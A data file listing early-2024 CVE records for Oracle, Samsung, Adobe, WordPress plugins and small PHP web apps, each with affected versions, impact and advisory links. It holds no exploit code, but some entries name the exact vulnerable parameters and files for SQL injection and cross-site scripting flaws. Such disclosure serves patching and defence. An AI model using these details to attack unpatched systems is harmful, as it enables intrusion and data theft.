CVE    2024    20905    Candidate    Vulnerability in the JD Edwards EnterpriseOne Tools product of Oracle JD Edwards (component: Enterprise Infrastructure SEC). Supported versions that are affected are Prior to 9.2.8.0. Easily exploitable vulnerability allows high privileged attacker with network access via JDENET to compromise JD Edwards EnterpriseOne Tools. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of JD Edwards EnterpriseOne Tools. CVSS 3.1 Base Score 2.7 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:L).    MISC:Oracle Advisory   |   URL:https://www.oracle.com/security-alerts/cpujan2024.html    Assigned (20231207)
CVE    2024    20904    Candidate    Vulnerability in the Oracle Business Intelligence Enterprise Edition product of Oracle Analytics (component: Pod Admin). Supported versions that are affected are 6.4.0.0.0 and 12.2.1.4.0. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle Business Intelligence Enterprise Edition. While the vulnerability is in Oracle Business Intelligence Enterprise Edition, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle Business Intelligence Enterprise Edition accessible data. CVSS 3.1 Base Score 5.0 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N).    MISC:Oracle Advisory   |   URL:https://www.oracle.com/security-alerts/cpujan2024.html    Assigned (20231207)
CVE    2024    20903    Candidate    Vulnerability in the Java VM component of Oracle Database Server. Supported versions that are affected are 19.3-19.21 and 21.3-21.12. Easily exploitable vulnerability allows low privileged attacker having Create Session, Create Procedure privilege with network access via Oracle Net to compromise Java VM. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Java VM accessible data. CVSS 3.1 Base Score 6.5 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N).    MISC:Oracle Advisory   |   URL:https://www.oracle.com/security-alerts/cpujan2024.html    Assigned (20231207)
CVE    2024    20841    Candidate    Improper Handling of Insufficient Privileges in Samsung Account prior to version 14.8.00.3 allows local attackers to access data.    MISC:https://security.samsungmobile.com/serviceWeb.smsb?year=2024&month=03   |   URL:https://security.samsungmobile.com/serviceWeb.smsb?year=2024&month=03    Assigned (20231205)
CVE    2024    20840    Candidate    Improper access control in Samsung Voice Recorder prior to versions 21.5.16.01 in Android 12 and Android 13, 21.4.51.02 in Android 14 allows physical attackers using hardware keyboard to use VoiceRecorder on the lock screen.    MISC:https://security.samsungmobile.com/serviceWeb.smsb?year=2024&month=03   |   URL:https://security.samsungmobile.com/serviceWeb.smsb?year=2024&month=03    Assigned (20231205)
CVE    2024    20839    Candidate    Improper access control in Samsung Voice Recorder prior to versions 21.5.16.01 in Android 12 and Android 13, 21.4.51.02 in Android 14 allows physical attackers to access recording files on the lock screen.    MISC:https://security.samsungmobile.com/serviceWeb.smsb?year=2024&month=03   |   URL:https://security.samsungmobile.com/serviceWeb.smsb?year=2024&month=03    Assigned (20231205)
CVE    2024    20838    Candidate    Improper validation vulnerability in Samsung Internet prior to version 24.0.3.2 allows local attackers to execute arbitrary code.    MISC:https://security.samsungmobile.com/serviceWeb.smsb?year=2024&month=03   |   URL:https://security.samsungmobile.com/serviceWeb.smsb?year=2024&month=03    Assigned (20231205)
CVE    2024    20837    Candidate    Improper handling of granting permission for Trusted Web Activities in Samsung Internet prior to version 24.0.0.41 allows local attackers to grant permission to their own TWA WebApps without user interaction.    MISC:https://security.samsungmobile.com/serviceWeb.smsb?year=2024&month=03   |   URL:https://security.samsungmobile.com/serviceWeb.smsb?year=2024&month=03    Assigned (20231205)
CVE    2024    20836    Candidate    Out of bounds Read vulnerability in ssmis_get_frm in libsubextractor.so prior to SMR Mar-2024 Release 1 allows local attackers to read out of bounds memory.    MISC:https://security.samsungmobile.com/securityUpdate.smsb?year=2024&month=03   |   URL:https://security.samsungmobile.com/securityUpdate.smsb?year=2024&month=03    Assigned (20231205)
CVE    2024    20835    Candidate    Improper access control vulnerability in CustomFrequencyManagerService prior to SMR Mar-2024 Release 1 allows local attackers to execute privileged behaviors.    MISC:https://security.samsungmobile.com/securityUpdate.smsb?year=2024&month=03   |   URL:https://security.samsungmobile.com/securityUpdate.smsb?year=2024&month=03    Assigned (20231205)
CVE    2024    20834    Candidate    The sensitive information exposure vulnerability in WlanTest prior to SMR Mar-2024 Release 1 allows local attackers to access MAC address without proper permission.    MISC:https://security.samsungmobile.com/securityUpdate.smsb?year=2024&month=03   |   URL:https://security.samsungmobile.com/securityUpdate.smsb?year=2024&month=03    Assigned (20231205)
CVE    2024    20833    Candidate    Use after free vulnerability in pub_crypto_recv_msg prior to SMR Mar-2024 Release 1 due to race condition allows local attackers with system privilege to cause memory corruption.    MISC:https://security.samsungmobile.com/securityUpdate.smsb?year=2024&month=03   |   URL:https://security.samsungmobile.com/securityUpdate.smsb?year=2024&month=03    Assigned (20231205)
CVE    2024    20832    Candidate    Heap overflow in Little Kernel in bootloader prior to SMR Mar-2024 Release 1 allows a privileged attacker to execute arbitrary code.    MISC:https://security.samsungmobile.com/securityUpdate.smsb?year=2024&month=03   |   URL:https://security.samsungmobile.com/securityUpdate.smsb?year=2024&month=03    Assigned (20231205)
CVE    2024    20831    Candidate    Stack overflow in Little Kernel in bootloader prior to SMR Mar-2024 Release 1 allows a privileged attacker to execute arbitrary code.    MISC:https://security.samsungmobile.com/securityUpdate.smsb?year=2024&month=03   |   URL:https://security.samsungmobile.com/securityUpdate.smsb?year=2024&month=03    Assigned (20231205)
CVE    2024    20830    Candidate    Incorrect default permission in AppLock prior to SMR Mar-2024 Release 1 allows local attackers to configure AppLock settings.    MISC:https://security.samsungmobile.com/securityUpdate.smsb?year=2024&month=03   |   URL:https://security.samsungmobile.com/securityUpdate.smsb?year=2024&month=03    Assigned (20231205)
CVE    2024    20829    Candidate    Missing proper interaction for opening deeplink in Samsung Internet prior to version v24.0.0.0 allows remote attackers to open an application without proper interaction.    MISC:https://security.samsungmobile.com/serviceWeb.smsb?year=2024&month=03   |   URL:https://security.samsungmobile.com/serviceWeb.smsb?year=2024&month=03    Assigned (20231205)
CVE    2024    20828    Candidate    Improper authorization verification vulnerability in Samsung Internet prior to version 24.0 allows physical attackers to access files downloaded in SecretMode without proper authentication.    MISC:https://security.samsungmobile.com/serviceWeb.smsb?year=2024&month=02   |   URL:https://security.samsungmobile.com/serviceWeb.smsb?year=2024&month=02    Assigned (20231205)
CVE    2024    20827    Candidate    Improper access control vulnerability in Samsung Gallery prior to version 14.5.04.4 allows physical attackers to access the picture using physical keyboard on the lockscreen.    MISC:https://security.samsungmobile.com/serviceWeb.smsb?year=2024&month=02   |   URL:https://security.samsungmobile.com/serviceWeb.smsb?year=2024&month=02    Assigned (20231205)
CVE    2024    20826    Candidate    Implicit intent hijacking vulnerability in UPHelper library prior to version 4.0.0 allows local attackers to access sensitive information via implicit intent.    MISC:https://security.samsungmobile.com/serviceWeb.smsb?year=2024&month=02   |   URL:https://security.samsungmobile.com/serviceWeb.smsb?year=2024&month=02    Assigned (20231205)
CVE    2024    20825    Candidate    Implicit intent hijacking vulnerability in IAP of Galaxy Store prior to version 4.5.63.6 allows local attackers to access sensitive information via implicit intent.    MISC:https://security.samsungmobile.com/serviceWeb.smsb?year=2024&month=02   |   URL:https://security.samsungmobile.com/serviceWeb.smsb?year=2024&month=02    Assigned (20231205)
CVE    2024    20824    Candidate    Implicit intent hijacking vulnerability in VoiceSearch of Galaxy Store prior to version 4.5.63.6 allows local attackers to access sensitive information via implicit intent.    MISC:https://security.samsungmobile.com/serviceWeb.smsb?year=2024&month=02   |   URL:https://security.samsungmobile.com/serviceWeb.smsb?year=2024&month=02    Assigned (20231205)
CVE    2024    20823    Candidate    Implicit intent hijacking vulnerability in SamsungAccount of Galaxy Store prior to version 4.5.63.6 allows local attackers to access sensitive information via implicit intent.    MISC:https://security.samsungmobile.com/serviceWeb.smsb?year=2024&month=02   |   URL:https://security.samsungmobile.com/serviceWeb.smsb?year=2024&month=02    Assigned (20231205)
CVE    2024    20822    Candidate    Implicit intent hijacking vulnerability in AccountActivity of Galaxy Store prior to version 4.5.63.6 allows local attackers to access sensitive information via implicit intent.    MISC:https://security.samsungmobile.com/serviceWeb.smsb?year=2024&month=02   |   URL:https://security.samsungmobile.com/serviceWeb.smsb?year=2024&month=02    Assigned (20231205)
CVE    2024    20820    Candidate    Improper input validation in bootloader prior to SMR Feb-2024 Release 1 allows attacker to cause an Out-Of-Bounds read.    MISC:https://security.samsungmobile.com/securityUpdate.smsb?year=2024&month=02   |   URL:https://security.samsungmobile.com/securityUpdate.smsb?year=2024&month=02    Assigned (20231205)
CVE    2024    20819    Candidate    Out-of-bounds Write vulnerabilities in svc1td_vld_plh_ap of libsthmbc.so prior to SMR Feb-2024 Release 1 allow local attackers to trigger buffer overflow.    MISC:https://security.samsungmobile.com/securityUpdate.smsb?year=2024&month=02   |   URL:https://security.samsungmobile.com/securityUpdate.smsb?year=2024&month=02    Assigned (20231205)
CVE    2024    20818    Candidate    Out-of-bounds Write vulnerabilities in svc1td_vld_elh of libsthmbc.so prior to SMR Feb-2024 Release 1 allow local attackers to trigger buffer overflow.    MISC:https://security.samsungmobile.com/securityUpdate.smsb?year=2024&month=02   |   URL:https://security.samsungmobile.com/securityUpdate.smsb?year=2024&month=02    Assigned (20231205)
CVE    2024    20817    Candidate    Out-of-bounds Write vulnerabilities in svc1td_vld_slh of libsthmbc.so prior to SMR Feb-2024 Release 1 allow local attackers to trigger buffer overflow.    MISC:https://security.samsungmobile.com/securityUpdate.smsb?year=2024&month=02   |   URL:https://security.samsungmobile.com/securityUpdate.smsb?year=2024&month=02    Assigned (20231205)
CVE    2024    20816    Candidate    Improper authentication vulnerability in onCharacteristicWriteRequest in Auto Hotspot prior to SMR Feb-2024 Release 1 allows adjacent attackers to connect to victim's mobile hotspot without user awareness.    MISC:https://security.samsungmobile.com/securityUpdate.smsb?year=2024&month=02   |   URL:https://security.samsungmobile.com/securityUpdate.smsb?year=2024&month=02    Assigned (20231205)
CVE    2024    20815    Candidate    Improper authentication vulnerability in onCharacteristicReadRequest in Auto Hotspot prior to SMR Feb-2024 Release 1 allows adjacent attackers to connect to victim's mobile hotspot without user awareness.    MISC:https://security.samsungmobile.com/securityUpdate.smsb?year=2024&month=02   |   URL:https://security.samsungmobile.com/securityUpdate.smsb?year=2024&month=02    Assigned (20231205)
CVE    2024    20814    Candidate    Out-of-bounds Read in padmd_vld_ac_prog_refine of libpadm.so prior to SMR Feb-2024 Release 1 allows an attacker to access unauthorized information.    MISC:https://security.samsungmobile.com/securityUpdate.smsb?year=2024&month=02   |   URL:https://security.samsungmobile.com/securityUpdate.smsb?year=2024&month=02    Assigned (20231205)
CVE    2024    20813    Candidate    Out-of-bounds Write in padmd_vld_qtbl of libpadm.so prior to SMR Feb-2024 Release 1 allows local attacker to execute arbitrary code.    MISC:https://security.samsungmobile.com/securityUpdate.smsb?year=2024&month=02   |   URL:https://security.samsungmobile.com/securityUpdate.smsb?year=2024&month=02    Assigned (20231205)
CVE    2024    20812    Candidate    Out-of-bounds Write in padmd_vld_htbl of libpadm.so prior to SMR Feb-2024 Release 1 allows local attacker to execute arbitrary code.    MISC:https://security.samsungmobile.com/securityUpdate.smsb?year=2024&month=02   |   URL:https://security.samsungmobile.com/securityUpdate.smsb?year=2024&month=02    Assigned (20231205)
CVE    2024    20811    Candidate    Improper caller verification in GameOptimizer prior to SMR Feb-2024 Release 1 allows local attackers to configure GameOptimizer.    MISC:https://security.samsungmobile.com/securityUpdate.smsb?year=2024&month=02   |   URL:https://security.samsungmobile.com/securityUpdate.smsb?year=2024&month=02    Assigned (20231205)
CVE    2024    20810    Candidate    Implicit intent hijacking vulnerability in Smart Suggestions prior to SMR Feb-2024 Release 1 allows attackers to get sensitive information.    MISC:https://security.samsungmobile.com/securityUpdate.smsb?year=2024&month=02   |   URL:https://security.samsungmobile.com/securityUpdate.smsb?year=2024&month=02    Assigned (20231205)
CVE    2024    20809    Candidate    Improper access control vulnerability in Nearby device scanning prior to version 11.1.14.7 allows local attacker to access data.    MISC:https://security.samsungmobile.com/serviceWeb.smsb?year=2024&month=01   |   URL:https://security.samsungmobile.com/serviceWeb.smsb?year=2024&month=01    Assigned (20231205)
CVE    2024    20807    Candidate    Implicit intent hijacking vulnerability in Samsung Email prior to version 6.1.90.16 allows attacker to get sensitive information.    MISC:https://security.samsungmobile.com/serviceWeb.smsb?year=2024&month=01   |   URL:https://security.samsungmobile.com/serviceWeb.smsb?year=2024&month=01    Assigned (20231205)
CVE    2024    20806    Candidate    Improper access control in Notification service prior to SMR Jan-2024 Release 1 allows local attacker to access notification data.    MISC:https://security.samsungmobile.com/securityUpdate.smsb?year=2024&month=01   |   URL:https://security.samsungmobile.com/securityUpdate.smsb?year=2024&month=01    Assigned (20231205)
CVE    2024    20805    Candidate    Path traversal vulnerability in ZipCompressor of MyFiles prior to SMR Jan-2024 Release 1 in Android 11 and Android 12, and version 14.5.00.21 in Android 13 allows attackers to write arbitrary file.    MISC:https://security.samsungmobile.com/securityUpdate.smsb?year=2024&month=01   |   URL:https://security.samsungmobile.com/securityUpdate.smsb?year=2024&month=01    Assigned (20231205)
CVE    2024    20804    Candidate    Path traversal vulnerability in FileUriConverter of MyFiles prior to SMR Jan-2024 Release 1 in Android 11 and Android 12, and version 14.5.00.21 in Android 13 allows attackers to write arbitrary file.    MISC:https://security.samsungmobile.com/securityUpdate.smsb?year=2024&month=01   |   URL:https://security.samsungmobile.com/securityUpdate.smsb?year=2024&month=01    Assigned (20231205)
CVE    2024    20803    Candidate    Improper authentication vulnerability in Bluetooth pairing process prior to SMR Jan-2024 Release 1 allows remote attackers to establish pairing process without user interaction.    MISC:https://security.samsungmobile.com/securityUpdate.smsb?year=2024&month=01   |   URL:https://security.samsungmobile.com/securityUpdate.smsb?year=2024&month=01    Assigned (20231205)
CVE    2024    20802    Candidate    Improper access control vulnerability in Samsung DeX prior to SMR Jan-2024 Release 1 allows owner to access other users' notification in a multi-user environment.    MISC:https://security.samsungmobile.com/securityUpdate.smsb?year=2024&month=01   |   URL:https://security.samsungmobile.com/securityUpdate.smsb?year=2024&month=01    Assigned (20231205)
CVE    2024    2080    Candidate    The LiquidPoll – Polls, Surveys, NPS and Feedback Reviews plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 3.3.76 via the poller_list shortcode. This makes it possible for authenticated attackers, with contributor-level access and above, to extract information from polls that may be private.    MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3054831%40wp-poll&new=3054831%40wp-poll&sfp_email=&sfph_mail=   |   URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3054831%40wp-poll&new=3054831%40wp-poll&sfp_email=&sfph_mail=   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/84f57623-b6a6-4717-857d-93fa9d279882?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/84f57623-b6a6-4717-857d-93fa9d279882?source=cve    Assigned (20240301)
CVE    2024    2079    Candidate    The WPBakery Page Builder Addons by Livemesh plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'per_line_mobile' shortcode in all versions up to, and including, 3.8.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.    MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3048239%40addons-for-visual-composer&new=3048239%40addons-for-visual-composer&sfp_email=&sfph_mail=   |   URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3048239%40addons-for-visual-composer&new=3048239%40addons-for-visual-composer&sfp_email=&sfph_mail=   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/2c07b5c8-7fae-499d-9f6c-9392166f74b8?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/2c07b5c8-7fae-499d-9f6c-9392166f74b8?source=cve    Assigned (20240301)
CVE    2024    2078    Candidate    A Cross-Site Scripting (XSS) vulnerability has been found in HelpDeskZ affecting version 2.0.2 and earlier. This vulnerability could allow an attacker to send a specially crafted JavaScript payload within the email field and partially take control of an authenticated user's browser session.    MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/cross-site-scripting-vulnerability-helpdeskz   |   URL:https://www.incibe.es/en/incibe-cert/notices/aviso/cross-site-scripting-vulnerability-helpdeskz    Assigned (20240301)
CVE    2024    2077    Candidate    A vulnerability classified as critical has been found in SourceCodester Simple Online Bidding System 1.0. This affects an unknown part of the file index.php. The manipulation of the argument category_id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-255393 was assigned to this vulnerability.    MISC:VDB-255393 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.255393   |   MISC:VDB-255393 | SourceCodester Simple Online Bidding System index.php sql injection   |   URL:https://vuldb.com/?id.255393   |   MISC:https://github.com/yethu123/vulns-finding/blob/main/Simple%20Online%20Bidding%20System.md   |   URL:https://github.com/yethu123/vulns-finding/blob/main/Simple%20Online%20Bidding%20System.md    Assigned (20240301)
CVE    2024    20767    Candidate    ColdFusion versions 2023.6, 2021.12 and earlier are affected by an Improper Access Control vulnerability that could lead to arbitrary file system read. An attacker could leverage this vulnerability to bypass security measures and gain unauthorized access to sensitive files and perform arbitrary file system write. Exploitation of this issue does not require user interaction.    MISC:https://helpx.adobe.com/security/products/coldfusion/apsb24-14.html   |   URL:https://helpx.adobe.com/security/products/coldfusion/apsb24-14.html    Assigned (20231204)
CVE    2024    20765    Candidate    Acrobat Reader versions 20.005.30539, 23.008.20470 and earlier are affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.    MISC:https://helpx.adobe.com/security/products/acrobat/apsb24-07.html   |   URL:https://helpx.adobe.com/security/products/acrobat/apsb24-07.html    Assigned (20231204)
CVE    2024    20764    Candidate    Animate versions 24.0, 23.0.3 and earlier are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file.    MISC:https://helpx.adobe.com/security/products/animate/apsb24-19.html   |   URL:https://helpx.adobe.com/security/products/animate/apsb24-19.html    Assigned (20231204)
CVE    2024    20761    Candidate    Animate versions 24.0, 23.0.3 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.    MISC:https://helpx.adobe.com/security/products/animate/apsb24-19.html   |   URL:https://helpx.adobe.com/security/products/animate/apsb24-19.html    Assigned (20231204)
CVE    2024    2076    Candidate    A vulnerability was found in CodeAstro House Rental Management System 1.0. It has been rated as problematic. Affected by this issue is some unknown functionality of the file booking.php/owner.php/tenant.php. The manipulation leads to missing authentication. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-255392.    MISC:VDB-255392 | CTI Indicators (IOB, IOC, IOA)   |   URL:https://vuldb.com/?ctiid.255392   |   MISC:VDB-255392 | CodeAstro House Rental Management System tenant.php missing authentication   |   URL:https://vuldb.com/?id.255392   |   MISC:https://docs.qq.com/doc/DYlREVXpuRUFwRFpQ   |   URL:https://docs.qq.com/doc/DYlREVXpuRUFwRFpQ    Assigned (20240301)
CVE    2024    20757    Candidate    Bridge versions 13.0.5, 14.0.1 and earlier are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file.    MISC:https://helpx.adobe.com/security/products/bridge/apsb24-15.html   |   URL:https://helpx.adobe.com/security/products/bridge/apsb24-15.html    Assigned (20231204)
CVE    2024    20756    Candidate    Bridge versions 13.0.5, 14.0.1 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.    MISC:https://helpx.adobe.com/security/products/bridge/apsb24-15.html   |   URL:https://helpx.adobe.com/security/products/bridge/apsb24-15.html    Assigned (20231204)
CVE    2024    20755    Candidate    Bridge versions 13.0.5, 14.0.1 and earlier are affected by a Heap-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.    MISC:https://helpx.adobe.com/security/products/bridge/apsb24-15.html   |   URL:https://helpx.adobe.com/security/products/bridge/apsb24-15.html    Assigned (20231204)
CVE    2024    20754    Candidate    Lightroom Desktop versions 7.1.2 and earlier are affected by an Untrusted Search Path vulnerability that could result in arbitrary code execution in the context of the current user. If the application uses a search path to locate critical resources such as programs, then an attacker could modify that search path to point to a malicious program, which the targeted application would then execute. Exploitation of this issue requires user interaction in that a victim must open a malicious file.    MISC:https://helpx.adobe.com/security/products/lightroom/apsb24-17.html   |   URL:https://helpx.adobe.com/security/products/lightroom/apsb24-17.html    Assigned (20231204)
CVE    2024    20752    Candidate    Bridge versions 13.0.5, 14.0.1 and earlier are affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.    MISC:https://helpx.adobe.com/security/products/bridge/apsb24-15.html   |   URL:https://helpx.adobe.com/security/products/bridge/apsb24-15.html    Assigned (20231204)
CVE    2024    20750    Candidate    Substance3D - Designer versions 13.1.0 and earlier are affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure. An attacker could leverage this vulnerability to execute code in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.    MISC:https://helpx.adobe.com/security/products/substance3d_designer/apsb24-13.html   |   URL:https://helpx.adobe.com/security/products/substance3d_designer/apsb24-13.html    Assigned (20231204)
CVE    2024    2075    Candidate    A vulnerability was found in SourceCodester Daily Habit Tracker 1.0. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file /endpoint/update-tracker.php. The manipulation of the argument day leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-255391.    MISC:VDB-255391 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.255391   |   MISC:VDB-255391 | SourceCodester Daily Habit Tracker update-tracker.php cross site scripting   |   URL:https://vuldb.com/?id.255391   |   MISC:https://github.com/vanitashtml/CVE-Dumps/blob/main/Stored%20XSS%20Daily%20Habit%20Tracker.md   |   URL:https://github.com/vanitashtml/CVE-Dumps/blob/main/Stored%20XSS%20Daily%20Habit%20Tracker.md    Assigned (20240301)
CVE    2024    20749    Candidate    Acrobat Reader versions 20.005.30539, 23.008.20470 and earlier are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file.    MISC:https://www.talosintelligence.com/vulnerability_reports/TALOS-2023-1910   |   MISC:https://helpx.adobe.com/security/products/acrobat/apsb24-07.html   |   URL:https://helpx.adobe.com/security/products/acrobat/apsb24-07.html    Assigned (20231204)
CVE    2024    20746    Candidate    Premiere Pro versions 24.1, 23.6.2 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.    MISC:https://helpx.adobe.com/security/products/premiere_pro/apsb24-12.html   |   URL:https://helpx.adobe.com/security/products/premiere_pro/apsb24-12.html    Assigned (20231204)
CVE    2024    20745    Candidate    Premiere Pro versions 24.1, 23.6.2 and earlier are affected by a Heap-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.    MISC:https://helpx.adobe.com/security/products/premiere_pro/apsb24-12.html   |   URL:https://helpx.adobe.com/security/products/premiere_pro/apsb24-12.html    Assigned (20231204)
CVE    2024    20744    Candidate    Substance3D - Painter versions 9.1.1 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.    MISC:https://helpx.adobe.com/security/products/substance3d_painter/apsb24-04.html   |   URL:https://helpx.adobe.com/security/products/substance3d_painter/apsb24-04.html    Assigned (20231204)
CVE    2024    20742    Candidate    Substance3D - Painter versions 9.1.1 and earlier are affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure. An attacker could leverage this vulnerability to execute code in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.    MISC:https://helpx.adobe.com/security/products/substance3d_painter/apsb24-04.html   |   URL:https://helpx.adobe.com/security/products/substance3d_painter/apsb24-04.html    Assigned (20231204)
CVE    2024    20741    Candidate    Substance3D - Painter versions 9.1.1 and earlier are affected by a Write-what-where Condition vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.    MISC:https://helpx.adobe.com/security/products/substance3d_painter/apsb24-04.html   |   URL:https://helpx.adobe.com/security/products/substance3d_painter/apsb24-04.html    Assigned (20231204)
CVE    2024    2074    Candidate    A vulnerability was found in Mini-Tmall up to 20231017 and classified as critical. This issue affects some unknown processing of the file ?r=tmall/admin/user/1/1. The manipulation of the argument orderBy leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-255389 was assigned to this vulnerability.    MISC:VDB-255389 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.255389   |   MISC:VDB-255389 | Mini-Tmall 1 sql injection   |   URL:https://vuldb.com/?id.255389   |   MISC:https://github.com/yuziiiiiiiiii/CVE-SQL/blob/main/cve.md   |   URL:https://github.com/yuziiiiiiiiii/CVE-SQL/blob/main/cve.md    Assigned (20240301)
CVE    2024    20739    Candidate    Audition versions 24.0.3, 23.6.2 and earlier are affected by a Heap-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.    MISC:https://helpx.adobe.com/security/products/audition/apsb24-11.html   |   URL:https://helpx.adobe.com/security/products/audition/apsb24-11.html    Assigned (20231204)
CVE    2024    20738    Candidate    Adobe FrameMaker Publishing Server versions 2022.1 and earlier are affected by an Improper Authentication vulnerability that could result in a Security feature bypass. An attacker could leverage this vulnerability to bypass authentication mechanisms and gain unauthorized access. Exploitation of this issue does not require user interaction.    MISC:https://helpx.adobe.com/security/products/framemaker-publishing-server/apsb24-10.html   |   URL:https://helpx.adobe.com/security/products/framemaker-publishing-server/apsb24-10.html    Assigned (20231204)
CVE    2024    20734    Candidate    Acrobat Reader versions 20.005.30539, 23.008.20470 and earlier are affected by a Use After Free vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file.    MISC:https://helpx.adobe.com/security/products/acrobat/apsb24-07.html   |   URL:https://helpx.adobe.com/security/products/acrobat/apsb24-07.html    Assigned (20231204)
CVE    2024    20733    Candidate    Acrobat Reader versions 20.005.30539, 23.008.20470 and earlier are affected by an Improper Input Validation vulnerability that could lead to an application denial-of-service. An attacker could leverage this vulnerability to cause the application to crash, resulting in a denial of service. Exploitation of this issue requires user interaction in that a victim must open a malicious file.    MISC:https://helpx.adobe.com/security/products/acrobat/apsb24-07.html   |   URL:https://helpx.adobe.com/security/products/acrobat/apsb24-07.html    Assigned (20231204)
CVE    2024    20730    Candidate    Acrobat Reader versions 20.005.30539, 23.008.20470 and earlier are affected by an Integer Overflow or Wraparound vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.    MISC:https://www.talosintelligence.com/vulnerability_reports/TALOS-2023-1906   |   MISC:https://helpx.adobe.com/security/products/acrobat/apsb24-07.html   |   URL:https://helpx.adobe.com/security/products/acrobat/apsb24-07.html    Assigned (20231204)
CVE    2024    2073    Candidate    A vulnerability has been found in SourceCodester Block Inserter for Dynamic Content 1.0 and classified as critical. This vulnerability affects unknown code of the file view_post.php. The manipulation of the argument id leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-255388.    MISC:VDB-255388 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.255388   |   MISC:VDB-255388 | SourceCodester Block Inserter for Dynamic Content view_post.php sql injection   |   URL:https://vuldb.com/?id.255388   |   MISC:https://github.com/vanitashtml/CVE-Dumps/blob/main/Block%20Inserter%20for%20Dynamic%20Content%20-%20Sql%20Injection.md   |   URL:https://github.com/vanitashtml/CVE-Dumps/blob/main/Block%20Inserter%20for%20Dynamic%20Content%20-%20Sql%20Injection.md    Assigned (20240301)
CVE    2024    20728    Candidate    Acrobat Reader versions 20.005.30539, 23.008.20470 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.    MISC:https://helpx.adobe.com/security/products/acrobat/apsb24-07.html   |   URL:https://helpx.adobe.com/security/products/acrobat/apsb24-07.html    Assigned (20231204)
